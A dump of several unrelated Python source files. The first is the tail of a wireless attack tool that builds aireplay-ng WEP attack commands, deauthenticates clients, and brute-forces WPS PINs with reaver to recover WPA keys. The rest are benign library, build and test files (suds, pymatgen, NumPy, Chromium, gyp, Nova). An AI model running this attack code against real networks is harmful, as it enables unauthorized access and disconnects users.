"""
cmd = ''
if attack_num == 0:
cmd = ['aireplay-ng',
'--arpreplay',
'-b', target.bssid,
'-x', str(WEP_PPS)] # Packets per second
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 1:
cmd = ['aireplay-ng',
'--chopchop',
'-b', target.bssid,
'-x', str(WEP_PPS), # Packets per second
'-m', '60', # Minimum packet length (bytes)
'-n', '82', # Maxmimum packet length
'-F'] # Automatically choose the first packet
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 2:
cmd = ['aireplay-ng',
'--fragment',
'-b', target.bssid,
'-x', str(WEP_PPS), # Packets per second
'-m', '100', # Minimum packet length (bytes)
'-F'] # Automatically choose the first packet
if client_mac != '':
cmd.append('-h')
cmd.append(client_mac)
elif len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 3:
cmd = ['aireplay-ng',
'--caffe-latte',
'-b', target.bssid]
if len(clients) > 0:
cmd.append('-h')
cmd.append(clients[0].bssid)
cmd.append(iface)
elif attack_num == 4:
cmd = ['aireplay-ng',
'--interactive',
'-b', target.bssid,
'-c', 'ff:ff:ff:ff:ff:ff',
'-t', '1', # Only select packets with ToDS bit set
'-x', str(WEP_PPS), # Packets per second
'-F', # Automatically choose the first packet
'-p', '0841']
cmd.append(iface)
elif attack_num == 5:
if len(clients) == 0:
print R+' [0:00:00] unable to carry out hirte attack: '+O+'no clients'
return ''
cmd = ['aireplay-ng',
'--cfrag',
'-h', clients[0].bssid,
iface]
return cmd
def wep_send_deauths(iface, target, clients):
"""
Sends deauth packets to broadcast and every client.
"""
# Send deauth to broadcast
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', target.bssid,
iface]
call(cmd, stdout=DN, stderr=DN)
# Send deauth to every client
for client in clients:
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', target.bssid,
'-h', client.bssid,
iface]
call(cmd, stdout=DN, stderr=DN)
#################
# WPS FUNCTIONS #
#################
def wps_attack(iface, target):
"""
Mounts attack against target on iface.
Uses "reaver" to attempt to brute force the PIN.
Once PIN is found, PSK can be recovered.
PSK is displayed to user and added to WPS_FINDINGS
"""
print GR+' [0:00:00]'+W+' initializing %sWPS PIN attack%s on %s' % \
(G, W, G+target.ssid+W+' ('+G+target.bssid+W+')'+W)
cmd = ['reaver',
'-i', iface,
'-b', target.bssid,
'-o', temp + 'out.out', # Dump output to file to be monitored
'-a', # auto-detect best options, auto-resumes sessions, doesn't require input!
'-c', target.channel,
# '--ignore-locks',
'-vv'] # verbose output
proc = Popen(cmd, stdout=DN, stderr=DN)
cracked = False # Flag for when password/pin is found
percent = 'x.xx%' # Percentage complete
aps = 'x' # Seconds per attempt
time_started = time.time()
last_success = time_started # Time of last successful attempt
last_pin = '' # Keep track of last pin tried (to detect retries)
retries = 0 # Number of times we have attempted this PIN
tries_total = 0 # Number of times we have attempted all pins
tries = 0 # Number of successful attempts
pin = ''
key = ''
try:
while not cracked:
time.sleep(1)
if proc.poll() != None:
# Process stopped: Cracked? Failed?
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
for line in lines:
# When it's cracked:
if line.find("WPS PIN: '") != -1:
pin = line[line.find("WPS PIN: '") + 10:-1]
if line.find("WPA PSK: '") != -1:
key = line[line.find("WPA PSK: '") + 10:-1]
cracked = True
break
if not os.path.exists(temp + 'out.out'): continue
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
for line in lines:
if line.strip() == '': continue
# Status
if line.find(' complete @ ') != -1 and len(line) > 8:
percent = line.split(' ')[1]
i = line.find(' (')
j = line.find(' seconds/', i)
if i != -1 and j != -1: aps = line[i+2:j]
# PIN attempt
elif line.find(' Trying pin ') != -1:
pin = line.strip().split(' ')[-1]
if pin == last_pin:
retries += 1
elif tries_total == 0:
last_pin = pin
tries_total -= 1
else:
last_success = time.time()
tries += 1
last_pin = pin
retries = 0
tries_total += 1
# Warning
elif line.endswith('10 failed connections in a row'): pass
# Check for PIN/PSK
elif line.find("WPS PIN: '") != -1:
pin = line[line.find("WPS PIN: '") + 10:-1]
elif line.find("WPA PSK: '") != -1:
key = line[line.find("WPA PSK: '") + 10:-1]
cracked = True
if cracked: break
print ' %s WPS attack, %s success/ttl,' % \
(GR+sec_to_hms(time.time()-time_started)+W, \
G+str(tries)+W+'/'+O+str(tries_total)+W),
if percent == 'x.xx%' and aps == 'x': print '\r',
else:
print '%s complete (%s sec/att) \r' % (G+percent+W, G+aps+W),
if WPS_TIMEOUT > 0 and (time.time() - last_success) > WPS_TIMEOUT:
print R+'\n [!]'+O+' unable to complete successful try in %d seconds' % (WPS_TIMEOUT)
print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
break
if WPS_MAX_RETRIES > 0 and retries > WPS_MAX_RETRIES:
print R+'\n [!]'+O+' unable to complete successful try in %d retries' % (WPS_MAX_RETRIES)
print R+' [+]'+O+' the access point may have WPS-locking enabled, or is too far away'+W
print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
break
if WPS_RATIO_THRESHOLD > 0.0 and tries > 0 and (float(tries) / tries_total) < WPS_RATIO_THRESHOLD:
print R+'\n [!]'+O+' successful/total attempts ratio was too low (< %.2f)' % (WPS_RATIO_THRESHOLD)
print R+' [+]'+W+' skipping %s' % (G+target.ssid+W)
break
stdout.flush()
# Clear out output file if bigger than 1mb
inf = open(temp + 'out.out', 'w')
inf.close()
# End of big "while not cracked" loop
if cracked:
if pin != '': print GR+'\n\n [+]'+G+' PIN found: %s' % (C+pin+W)
if key != '': print GR+' [+] %sWPA key found:%s %s' % (G, W, C+key+W)
WPA_FINDINGS.append(W+"found %s's WPA key: \"%s\", WPS PIN: %s" % (G+target.ssid+W, C+key+W, C+pin+W))
WPA_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, "Key is '" + key + "' and PIN is '" + pin + "'", 'WPA')
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WPS brute-force attack interrupted'+W
if attack_interrupted_prompt():
send_interrupt(proc)
print ''
exit_gracefully(0)
send_interrupt(proc)
return cracked
#c = CapFile('hs/KillfuckSoulshitter_C0-C1-C0-07-54-DC_2.cap', 'Killfuck Soulshitter', 'c0:c1:c0:07:54:dc')
#WPA_CRACKER = 'aircrack'
#cracked = wpa_crack(c)
#print cracked
#exit_gracefully(1)
if __name__ == '__main__':
try:
banner()
main()
except KeyboardInterrupt: print R+'\n (^C)'+O+' interrupted\n'+W
except EOFError: print R+'\n (^D)'+O+' interrupted\n'+W
exit_gracefully(0)
|
peerster/CouchPotatoServer | refs/heads/master | libs/suds/umx/attrlist.py | 211 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Provides filtered attribute list classes.
"""
from suds import *
from suds.umx import *
from suds.sax import Namespace
class AttrList:
"""
A filtered attribute list.
Items are included during iteration if they are in either the (xs) or
(xml) namespaces.
@ivar raw: The I{raw} attribute list.
@type raw: list
"""
def __init__(self, attributes):
"""
@param attributes: A list of attributes
@type attributes: list
"""
self.raw = attributes
def real(self):
"""
Get list of I{real} attributes which exclude xs and xml attributes.
@return: A list of I{real} attributes.
@rtype: I{generator}
"""
for a in self.raw:
if self.skip(a): continue
yield a
def rlen(self):
"""
Get the number of I{real} attributes which exclude xs and xml attributes.
@return: A count of I{real} attributes.
@rtype: L{int}
"""
n = 0
for a in self.real():
n += 1
return n
def lang(self):
"""
Get list of I{filtered} attributes which exclude xs.
@return: A list of I{filtered} attributes.
@rtype: I{generator}
"""
for a in self.raw:
if a.qname() == 'xml:lang':
return a.value
return None
def skip(self, attr):
"""
Get whether to skip (filter-out) the specified attribute.
@param attr: An attribute.
@type attr: I{Attribute}
@return: True if should be skipped.
@rtype: bool
"""
ns = attr.namespace()
skip = (
Namespace.xmlns[1],
'http://schemas.xmlsoap.org/soap/encoding/',
'http://schemas.xmlsoap.org/soap/envelope/',
'http://www.w3.org/2003/05/soap-envelope',
)
return ( Namespace.xs(ns) or ns[1] in skip )
|
czhengsci/pymatgen | refs/heads/master | dev_scripts/chemenv/explicit_permutations.py | 14 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
"""
Development script of the ChemEnv utility to get the explicit permutations for coordination environments identified
with the explicit permutations algorithms (typically with coordination numbers <= 6)
"""
__author__ = "David Waroquiers"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "2.0"
__maintainer__ = "David Waroquiers"
__email__ = "david.waroquiers@gmail.com"
__date__ = "Feb 20, 2016"
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import LocalGeometryFinder
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import AbstractGeometry
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import AllCoordinationGeometries
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import ExplicitPermutationsAlgorithm
import numpy as np
import itertools
import json
import os
class Algo(object):
pass
if __name__ == '__main__':
# Choose the geometry
allcg = AllCoordinationGeometries()
while True:
cg_symbol = raw_input('Enter symbol of the geometry for which you want to get the explicit permutations : ')
try:
cg = allcg[cg_symbol]
break
except LookupError:
print('Wrong geometry, try again ...')
continue
# Check if the algorithm currently defined for this geometry corresponds to the explicit permutation algorithm
for algo in cg.algorithms:
if algo.algorithm_type != 'EXPLICIT_PERMUTATIONS':
raise ValueError('WRONG ALGORITHM !')
algo = Algo()
algo.permutations = []
for perm in itertools.permutations(range(cg.coordination)):
algo.permutations.append(perm)
lgf = LocalGeometryFinder()
lgf.setup_parameters(structure_refinement=lgf.STRUCTURE_REFINEMENT_NONE)
lgf.setup_test_perfect_environment(cg_symbol, randomness=True, indices='ORDERED')
lgf.perfect_geometry = AbstractGeometry.from_cg(cg=cg)
points_perfect = lgf.perfect_geometry.points_wocs_ctwocc()
res = lgf.coordination_geometry_symmetry_measures_standard(coordination_geometry=cg,
algo=algo,
points_perfect=points_perfect)
(csms, perms, algos, local2perfect_maps, perfect2local_maps) = res
csms_with_recorded_permutation = []
explicit_permutations = []
for icsm, csm in enumerate(csms):
found = False
for csm2 in csms_with_recorded_permutation:
if np.isclose(csm, csm2):
found = True
break
if not found:
csms_with_recorded_permutation.append(csm)
explicit_permutations.append(perms[icsm])
print('Permutations found : ')
print(explicit_permutations)
print('Current algorithm(s) :')
for algo in cg.algorithms:
print(algo)
if algo.algorithm_type == 'EXPLICIT_PERMUTATIONS':
print(algo.permutations)
else:
raise ValueError('WRONG ALGORITHM !')
test = raw_input('Save it ? ("y" to confirm)')
if test == 'y':
if len(cg.algorithms) != 1:
raise ValueError('Multiple algorithms !')
cg._algorithms = [ExplicitPermutationsAlgorithm(permutations=explicit_permutations)]
newgeom_dir = 'new_geometry_files'
if not os.path.exists(newgeom_dir):
os.makedirs(newgeom_dir)
f = open('{}/{}.json'.format(newgeom_dir, cg_symbol), 'w')
json.dump(cg.as_dict(), f)
f.close() |
GbalsaC/bitnamiP | refs/heads/master | venv/lib/python2.7/site-packages/numpy/testing/print_coercion_tables.py | 23 | #!/usr/bin/env python
"""Prints type-coercion tables for the built-in NumPy types"""
import numpy as np
# Generic object that can be added, but doesn't do anything else
class GenericObject:
def __init__(self, v):
self.v = v
def __add__(self, other):
return self
def __radd__(self, other):
return self
dtype = np.dtype('O')
def print_cancast_table(ntypes):
print 'X',
for char in ntypes: print char,
print
for row in ntypes:
print row,
for col in ntypes:
print int(np.can_cast(row, col)),
print
def print_coercion_table(ntypes, inputfirstvalue, inputsecondvalue, firstarray, use_promote_types=False):
print '+',
for char in ntypes: print char,
print
for row in ntypes:
if row == 'O':
rowtype = GenericObject
else:
rowtype = np.obj2sctype(row)
print row,
for col in ntypes:
if col == 'O':
coltype = GenericObject
else:
coltype = np.obj2sctype(col)
try:
if firstarray:
rowvalue = np.array([rowtype(inputfirstvalue)], dtype=rowtype)
else:
rowvalue = rowtype(inputfirstvalue)
colvalue = coltype(inputsecondvalue)
if use_promote_types:
char = np.promote_types(rowvalue.dtype, colvalue.dtype).char
else:
value = np.add(rowvalue,colvalue)
if isinstance(value, np.ndarray):
char = value.dtype.char
else:
char = np.dtype(type(value)).char
except ValueError:
char = '!'
except OverflowError:
char = '@'
except TypeError:
char = '#'
print char,
print
print "can cast"
print_cancast_table(np.typecodes['All'])
print
print "In these tables, ValueError is '!', OverflowError is '@', TypeError is '#'"
print
print "scalar + scalar"
print_coercion_table(np.typecodes['All'], 0, 0, False)
print
print "scalar + neg scalar"
print_coercion_table(np.typecodes['All'], 0, -1, False)
print
print "array + scalar"
print_coercion_table(np.typecodes['All'], 0, 0, True)
print
print "array + neg scalar"
print_coercion_table(np.typecodes['All'], 0, -1, True)
print
print "promote_types"
print_coercion_table(np.typecodes['All'], 0, 0, False, True)
|
littlstar/chromium.src | refs/heads/nw | chrome/test/chromedriver/embed_extension_in_cpp.py | 158 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Embeds Chrome user data files in C++ code."""
import base64
import optparse
import os
import StringIO
import sys
import zipfile
import cpp_source
def main():
parser = optparse.OptionParser()
parser.add_option(
'', '--directory', type='string', default='.',
help='Path to directory where the cc/h file should be created')
options, args = parser.parse_args()
global_string_map = {}
string_buffer = StringIO.StringIO()
zipper = zipfile.ZipFile(string_buffer, 'w')
for f in args:
zipper.write(f, os.path.basename(f), zipfile.ZIP_STORED)
zipper.close()
global_string_map['kAutomationExtension'] = base64.b64encode(
string_buffer.getvalue())
string_buffer.close()
cpp_source.WriteSource('embedded_automation_extension',
'chrome/test/chromedriver/chrome',
options.directory, global_string_map)
if __name__ == '__main__':
sys.exit(main())
|
IAMATinyCoder/SocialEDU | refs/heads/master | node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/tools/pretty_sln.py | 806 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import re
import sys
import pretty_vcproj
def BuildProject(project, built, projects, deps):
# if all dependencies are done, we can build it, otherwise we try to build the
# dependency.
# This is not infinite-recursion proof.
for dep in deps[project]:
if dep not in built:
BuildProject(dep, built, projects, deps)
print project
built.append(project)
def ParseSolution(solution_file):
# All projects, their clsid and paths.
projects = dict()
# A list of dependencies associated with a project.
dependencies = dict()
# Regular expressions that matches the SLN format.
# The first line of a project definition.
begin_project = re.compile(('^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
'}"\) = "(.*)", "(.*)", "(.*)"$'))
# The last line of a project definition.
end_project = re.compile('^EndProject$')
# The first line of a dependency list.
begin_dep = re.compile('ProjectSection\(ProjectDependencies\) = postProject$')
# The last line of a dependency list.
end_dep = re.compile('EndProjectSection$')
# A line describing a dependency.
dep_line = re.compile(' *({.*}) = ({.*})$')
in_deps = False
solution = open(solution_file)
for line in solution:
results = begin_project.search(line)
if results:
# Hack to remove icu because the diff is too different.
if results.group(1).find('icu') != -1:
continue
# We remove "_gyp" from the names because it helps to diff them.
current_project = results.group(1).replace('_gyp', '')
projects[current_project] = [results.group(2).replace('_gyp', ''),
results.group(3),
results.group(2)]
dependencies[current_project] = []
continue
results = end_project.search(line)
if results:
current_project = None
continue
results = begin_dep.search(line)
if results:
in_deps = True
continue
results = end_dep.search(line)
if results:
in_deps = False
continue
results = dep_line.search(line)
if results and in_deps and current_project:
dependencies[current_project].append(results.group(1))
continue
# Change all dependencies clsid to name instead.
for project in dependencies:
# For each dependencies in this project
new_dep_array = []
for dep in dependencies[project]:
# Look for the project name matching this cldis
for project_info in projects:
if projects[project_info][1] == dep:
new_dep_array.append(project_info)
dependencies[project] = sorted(new_dep_array)
return (projects, dependencies)
def PrintDependencies(projects, deps):
print "---------------------------------------"
print "Dependencies for all projects"
print "---------------------------------------"
print "-- --"
for (project, dep_list) in sorted(deps.items()):
print "Project : %s" % project
print "Path : %s" % projects[project][0]
if dep_list:
for dep in dep_list:
print " - %s" % dep
print ""
print "-- --"
def PrintBuildOrder(projects, deps):
print "---------------------------------------"
print "Build order "
print "---------------------------------------"
print "-- --"
built = []
for (project, _) in sorted(deps.items()):
if project not in built:
BuildProject(project, built, projects, deps)
print "-- --"
def PrintVCProj(projects):
for project in projects:
print "-------------------------------------"
print "-------------------------------------"
print project
print project
print project
print "-------------------------------------"
print "-------------------------------------"
project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
projects[project][2]))
pretty = pretty_vcproj
argv = [ '',
project_path,
'$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1]),
]
argv.extend(sys.argv[3:])
pretty.main(argv)
def main():
# check if we have exactly 1 parameter.
if len(sys.argv) < 2:
print 'Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0]
return 1
(projects, deps) = ParseSolution(sys.argv[1])
PrintDependencies(projects, deps)
PrintBuildOrder(projects, deps)
if '--recursive' in sys.argv:
PrintVCProj(projects)
return 0
if __name__ == '__main__':
sys.exit(main())
|
hclivess/Stallion | refs/heads/master | nuitka/Cryptodome/Hash/RIPEMD.py | 7 | # -*- coding: utf-8 -*-
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
# This file exists for backward compatibility with old code that refers to
# Cryptodome.Hash.RIPEMD
"""Deprecated alias for `Cryptodome.Hash.RIPEMD160`"""
from Cryptodome.Hash.RIPEMD160 import new, block_size, digest_size
|
cernops/nova | refs/heads/master | nova/tests/unit/cells/test_cells_messaging.py | 2 | # Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Cells Messaging module
"""
import uuid
import mock
from mox3 import mox
import oslo_messaging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from nova.cells import messaging
from nova.cells import rpcapi as cells_rpcapi
from nova.cells import utils as cells_utils
from nova.compute import task_states
from nova.compute import vm_states
import nova.conf
from nova import context
from nova import db
from nova import exception
from nova import objects
from nova.objects import base as objects_base
from nova.objects import fields as objects_fields
from nova import rpc
from nova import test
from nova.tests.unit.cells import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit import fake_server_actions
CONF = nova.conf.CONF
class CellsMessageClassesTestCase(test.NoDBTestCase):
"""Test case for the main Cells Message classes."""
def setUp(self):
super(CellsMessageClassesTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self.our_name = 'api-cell'
self.msg_runner = fakes.get_message_runner(self.our_name)
self.state_manager = self.msg_runner.state_manager
def test_reverse_path(self):
path = 'a!b!c!d'
expected = 'd!c!b!a'
rev_path = messaging._reverse_path(path)
self.assertEqual(expected, rev_path)
def test_response_cell_name_from_path(self):
# test array with tuples of inputs/expected outputs
test_paths = [('cell1', 'cell1'),
('cell1!cell2', 'cell2!cell1'),
('cell1!cell2!cell3', 'cell3!cell2!cell1')]
for test_input, expected_output in test_paths:
self.assertEqual(expected_output,
messaging._response_cell_name_from_path(test_input))
def test_response_cell_name_from_path_neighbor_only(self):
# test array with tuples of inputs/expected outputs
test_paths = [('cell1', 'cell1'),
('cell1!cell2', 'cell2!cell1'),
('cell1!cell2!cell3', 'cell3!cell2')]
for test_input, expected_output in test_paths:
self.assertEqual(expected_output,
messaging._response_cell_name_from_path(test_input,
neighbor_only=True))
def test_response_to_json_and_from_json(self):
fake_uuid = str(uuid.uuid4())
response = messaging.Response(self.ctxt, 'child-cell!api-cell',
objects.Instance(id=1, uuid=fake_uuid),
False)
json_response = response.to_json()
deserialized_response = messaging.Response.from_json(self.ctxt,
json_response)
obj = deserialized_response.value
self.assertIsInstance(obj, objects.Instance)
self.assertEqual(1, obj.id)
self.assertEqual(fake_uuid, obj.uuid)
def test_targeted_message(self):
self.flags(max_hop_count=99, group='cells')
target_cell = 'api-cell!child-cell2!grandchild-cell1'
method = 'fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell)
self.assertEqual(self.ctxt, tgt_message.ctxt)
self.assertEqual(method, tgt_message.method_name)
self.assertEqual(method_kwargs, tgt_message.method_kwargs)
self.assertEqual(direction, tgt_message.direction)
self.assertEqual(target_cell, target_cell)
self.assertFalse(tgt_message.fanout)
self.assertFalse(tgt_message.need_response)
self.assertEqual(self.our_name, tgt_message.routing_path)
self.assertEqual(1, tgt_message.hop_count)
self.assertEqual(99, tgt_message.max_hop_count)
self.assertFalse(tgt_message.is_broadcast)
# Correct next hop?
next_hop = tgt_message._get_next_hop()
child_cell = self.state_manager.get_child_cell('child-cell2')
self.assertEqual(child_cell, next_hop)
def test_create_targeted_message_with_response(self):
self.flags(max_hop_count=99, group='cells')
our_name = 'child-cell1'
target_cell = 'child-cell1!api-cell'
msg_runner = fakes.get_message_runner(our_name)
method = 'fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'up'
tgt_message = messaging._TargetedMessage(msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell,
need_response=True)
self.assertEqual(self.ctxt, tgt_message.ctxt)
self.assertEqual(method, tgt_message.method_name)
self.assertEqual(method_kwargs, tgt_message.method_kwargs)
self.assertEqual(direction, tgt_message.direction)
self.assertEqual(target_cell, target_cell)
self.assertFalse(tgt_message.fanout)
self.assertTrue(tgt_message.need_response)
self.assertEqual(our_name, tgt_message.routing_path)
self.assertEqual(1, tgt_message.hop_count)
self.assertEqual(99, tgt_message.max_hop_count)
self.assertFalse(tgt_message.is_broadcast)
# Correct next hop?
next_hop = tgt_message._get_next_hop()
parent_cell = msg_runner.state_manager.get_parent_cell('api-cell')
self.assertEqual(parent_cell, next_hop)
def test_targeted_message_when_target_is_cell_state(self):
method = 'fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
target_cell = self.state_manager.get_child_cell('child-cell2')
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell)
self.assertEqual('api-cell!child-cell2', tgt_message.target_cell)
# Correct next hop?
next_hop = tgt_message._get_next_hop()
self.assertEqual(target_cell, next_hop)
def test_targeted_message_when_target_cell_state_is_me(self):
method = 'fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
target_cell = self.state_manager.get_my_state()
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell)
self.assertEqual('api-cell', tgt_message.target_cell)
# Correct next hop?
next_hop = tgt_message._get_next_hop()
self.assertEqual(target_cell, next_hop)
def test_create_broadcast_message(self):
self.flags(max_hop_count=99, group='cells')
self.flags(name='api-cell', max_hop_count=99, group='cells')
method = 'fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
bcast_message = messaging._BroadcastMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction)
self.assertEqual(self.ctxt, bcast_message.ctxt)
self.assertEqual(method, bcast_message.method_name)
self.assertEqual(method_kwargs, bcast_message.method_kwargs)
self.assertEqual(direction, bcast_message.direction)
self.assertFalse(bcast_message.fanout)
self.assertFalse(bcast_message.need_response)
self.assertEqual(self.our_name, bcast_message.routing_path)
self.assertEqual(1, bcast_message.hop_count)
self.assertEqual(99, bcast_message.max_hop_count)
self.assertTrue(bcast_message.is_broadcast)
# Correct next hops?
next_hops = bcast_message._get_next_hops()
child_cells = self.state_manager.get_child_cells()
self.assertEqual(child_cells, next_hops)
def test_create_broadcast_message_with_response(self):
self.flags(max_hop_count=99, group='cells')
our_name = 'child-cell1'
msg_runner = fakes.get_message_runner(our_name)
method = 'fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'up'
bcast_message = messaging._BroadcastMessage(msg_runner, self.ctxt,
method, method_kwargs, direction, need_response=True)
self.assertEqual(self.ctxt, bcast_message.ctxt)
self.assertEqual(method, bcast_message.method_name)
self.assertEqual(method_kwargs, bcast_message.method_kwargs)
self.assertEqual(direction, bcast_message.direction)
self.assertFalse(bcast_message.fanout)
self.assertTrue(bcast_message.need_response)
self.assertEqual(our_name, bcast_message.routing_path)
self.assertEqual(1, bcast_message.hop_count)
self.assertEqual(99, bcast_message.max_hop_count)
self.assertTrue(bcast_message.is_broadcast)
# Correct next hops?
next_hops = bcast_message._get_next_hops()
parent_cells = msg_runner.state_manager.get_parent_cells()
self.assertEqual(parent_cells, next_hops)
def test_self_targeted_message(self):
target_cell = 'api-cell'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
call_info = {}
def our_fake_method(message, **kwargs):
call_info['context'] = message.ctxt
call_info['routing_path'] = message.routing_path
call_info['kwargs'] = kwargs
fakes.stub_tgt_method(self, 'api-cell', 'our_fake_method',
our_fake_method)
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell)
tgt_message.process()
self.assertEqual(self.ctxt, call_info['context'])
self.assertEqual(method_kwargs, call_info['kwargs'])
self.assertEqual(target_cell, call_info['routing_path'])
def test_child_targeted_message(self):
target_cell = 'api-cell!child-cell1'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
call_info = {}
def our_fake_method(message, **kwargs):
call_info['context'] = message.ctxt
call_info['routing_path'] = message.routing_path
call_info['kwargs'] = kwargs
fakes.stub_tgt_method(self, 'child-cell1', 'our_fake_method',
our_fake_method)
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell)
tgt_message.process()
self.assertEqual(self.ctxt, call_info['context'])
self.assertEqual(method_kwargs, call_info['kwargs'])
self.assertEqual(target_cell, call_info['routing_path'])
def test_child_targeted_message_with_object(self):
target_cell = 'api-cell!child-cell1'
method = 'our_fake_method'
direction = 'down'
call_info = {}
class CellsMsgingTestObject(objects_base.NovaObject):
"""Test object. We just need 1 field in order to test
that this gets serialized properly.
"""
fields = {'test': objects_fields.StringField()}
objects_base.NovaObjectRegistry.register(CellsMsgingTestObject)
test_obj = CellsMsgingTestObject()
test_obj.test = 'meow'
method_kwargs = dict(obj=test_obj, arg1=1, arg2=2)
def our_fake_method(message, **kwargs):
call_info['context'] = message.ctxt
call_info['routing_path'] = message.routing_path
call_info['kwargs'] = kwargs
fakes.stub_tgt_method(self, 'child-cell1', 'our_fake_method',
our_fake_method)
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell)
tgt_message.process()
self.assertEqual(self.ctxt, call_info['context'])
self.assertEqual(target_cell, call_info['routing_path'])
self.assertEqual(3, len(call_info['kwargs']))
self.assertEqual(1, call_info['kwargs']['arg1'])
self.assertEqual(2, call_info['kwargs']['arg2'])
# Verify we get a new object with what we expect.
obj = call_info['kwargs']['obj']
self.assertIsInstance(obj, CellsMsgingTestObject)
self.assertNotEqual(id(test_obj), id(obj))
self.assertEqual(test_obj.test, obj.test)
def test_grandchild_targeted_message(self):
target_cell = 'api-cell!child-cell2!grandchild-cell1'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
call_info = {}
def our_fake_method(message, **kwargs):
call_info['context'] = message.ctxt
call_info['routing_path'] = message.routing_path
call_info['kwargs'] = kwargs
fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
our_fake_method)
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell)
tgt_message.process()
self.assertEqual(self.ctxt, call_info['context'])
